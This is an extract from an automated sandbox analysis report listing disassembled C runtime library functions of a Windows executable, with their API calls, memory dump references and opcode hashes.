                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cfb08ae918c6bbe95c4a62100c8a7c8242eaab00293a2acababb5bdea13c93a7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53B16E33D1E5B305C735862D485822BEE626E92B4131BC3B6DCD03FACDC23AAD0996D4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004041A0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401549), ref: 004041A8
                                                                                                                                                                                                                                                                                                                                                                  • __mtterm.LIBCMT ref: 004041B4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: DecodePointer.KERNEL32(00000005,00404316,?,00401549), ref: 00403E84
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: TlsFree.KERNEL32(00000002,00404316,?,00401549), ref: 00403E9E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: DeleteCriticalSection.KERNEL32(00000000,00000000,77375810,?,00404316,?,00401549), ref: 004046CF
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: _free.LIBCMT ref: 004046D2
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403E73: DeleteCriticalSection.KERNEL32(00000002,77375810,?,00404316,?,00401549), ref: 004046F9
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004041CA
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004041D7
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004041E4
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004041F1
                                                                                                                                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,00401549), ref: 00404241
                                                                                                                                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,00401549), ref: 0040425C
                                                                                                                                                                                                                                                                                                                                                                  • __init_pointers.LIBCMT ref: 00404266
                                                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,00401549), ref: 00404277
                                                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,00401549), ref: 00404284
                                                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,00401549), ref: 00404291
                                                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(?,00401549), ref: 0040429E
                                                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(Function_00003FF7,?,00401549), ref: 004042BF
                                                                                                                                                                                                                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 004042D4
                                                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(00000000,?,00401549), ref: 004042EE
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00404300
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3698121176-3819984048
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cbc81ace7e8aed11d47997de51eeb62a2c9a6c79db5613dd093cfc8f1bf93a05
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a0f7951c94fa4b33b50bd7d0535fda9b2e27fb8df27acd751501bc7d14e3bc1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbc81ace7e8aed11d47997de51eeb62a2c9a6c79db5613dd093cfc8f1bf93a05
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5931A6729422129BCB31AFB9EC499563FA4EBA4354701013BF521A36F0DBB48448EF95
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040D6EE Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 0|]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 888903860-1299851057
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5790133d6ff639bfcd36794fd8b5d889e15627640a797947bdf71ab940860c44
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 731aa1c8d6d5dfd3d485811297dd79a8d5fd6348316387e40cc81dde167a7788
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5790133d6ff639bfcd36794fd8b5d889e15627640a797947bdf71ab940860c44
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA21EA39504A01ABE7217F9AD80291B7BE4DF85794B20403FF885772E1EE399C05CE5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040CB85 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040CADC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: __mtinitlocknum.LIBCMT ref: 00404810
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: __amsg_exit.LIBCMT ref: 0040481C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: EnterCriticalSection.KERNEL32(?,?,?,00403EFA,0000000D), ref: 00404824
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(00000000), ref: 0040CAEE
                                                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0040CB03
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405342: HeapFree.KERNEL32(00000000,00000000,?,00403FCE,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 00405358
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405342: GetLastError.KERNEL32(00000000,?,00403FCE,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 0040536A
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040CB1C
                                                                                                                                                                                                                                                                                                                                                                  • ___removelocaleref.LIBCMT ref: 0040CB2B
                                                                                                                                                                                                                                                                                                                                                                  • ___freetlocinfo.LIBCMT ref: 0040CB44
                                                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0040CB61
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 0|]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 556454624-1299851057
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8eea58b5b504349ba5ec76f70c56eb3e3b59d7e91ff100543da38d48bd871ae5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7f7fa4578048f67398edcee87a534f6b82c7b5a3ea207e2f20094a40fb616e9d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8eea58b5b504349ba5ec76f70c56eb3e3b59d7e91ff100543da38d48bd871ae5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF11C131501704D6DB30AFA9A886B1B77E4AF00714F20423FF485BB2D1DA7CA880DA5C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403EB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,005D5840,00000008,00403FB8,00000000,00000000,?,?,00401783,00401870,?,0040113D,?,?,00000000), ref: 00403EC1
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00403EF5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: __mtinitlocknum.LIBCMT ref: 00404810
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: __amsg_exit.LIBCMT ref: 0040481C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004047FA: EnterCriticalSection.KERNEL32(?,?,?,00403EFA,0000000D), ref: 00404824
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(005D75A0), ref: 00403F02
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00403F16
                                                                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 00403F34
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                                                                                                  • String ID: 0|]$KERNEL32.DLL
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 637971194-1600287274
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 69f06a74c447a22ada258c021a0f03cdb7258d261a95eb0f98c42ecbf1972d1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8f16b0255503f691f8a3e543b44cc219df7106ce82ae31dbeb5ac327894f1df1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69f06a74c447a22ada258c021a0f03cdb7258d261a95eb0f98c42ecbf1972d1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E015271405B00DBD720AF6AD406749BBF0BF50315F10891FE599663E0CBB4AA44DB19
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040589D Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 004058A9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
                                                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 004058C9
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 004058D9
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004058F6
                                                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00405909
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(023A1688), ref: 00405921
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3470314060-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 33181e8ec0f922a003a214b633089255946aa2815f78c07681ab6451bcf2ff92
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7f72c543f57e19f5ebbb72d3d602035d3835e0651ff43b30e1a66ef83f7e2d14
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33181e8ec0f922a003a214b633089255946aa2815f78c07681ab6451bcf2ff92
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27018B72902A25EBCB20AB699805B5B77A0FF04724F14412BF801B73D0DB386A51DF9A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040CB90 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040CB9C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
                                                                                                                                                                                                                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 0040CBA7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401955: Sleep.KERNEL32(00000000), ref: 0040197D
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040CBDD
                                                                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0040CBE9
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040CBFD
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040CC0D
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040177E: __getptd_noexit.LIBCMT ref: 0040177E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3803058747-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4581fc5b44cedc6388dc6f186122ee8f2792b08881d46a136e530d971f11c6e8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 50812d6c148537c975f453f210ee234fcded8bd6a716d7ccd869d7ac18e2cda8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4581fc5b44cedc6388dc6f186122ee8f2792b08881d46a136e530d971f11c6e8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36019E71501701EAE720BFB9D846B0D7BA0AF04724F20462FF459B72D1CB7859009B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040C80A Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,?,?,005D5B40,0000000C), ref: 0040C83E
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,005D5B40,0000000C), ref: 0040C848
                                                                                                                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0040C84F
                                                                                                                                                                                                                                                                                                                                                                  • __alloc_osfhnd.LIBCMT ref: 0040C870
                                                                                                                                                                                                                                                                                                                                                                  • __set_osfhnd.LIBCMT ref: 0040C89A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 43408053-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52c800735ce2767c80bdb55c38c92d91d6df7c7cee2aea7387d499ee4b27126b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d90f798e2c096a9db0fe2a23a860d11de54a66586ad50496df02bf1c65ad6b1f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52c800735ce2767c80bdb55c38c92d91d6df7c7cee2aea7387d499ee4b27126b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37212532541205DACB21BF75C8817D97B60AF42329F28C76BE464AB2E2C77D8541DF8D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040454D Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
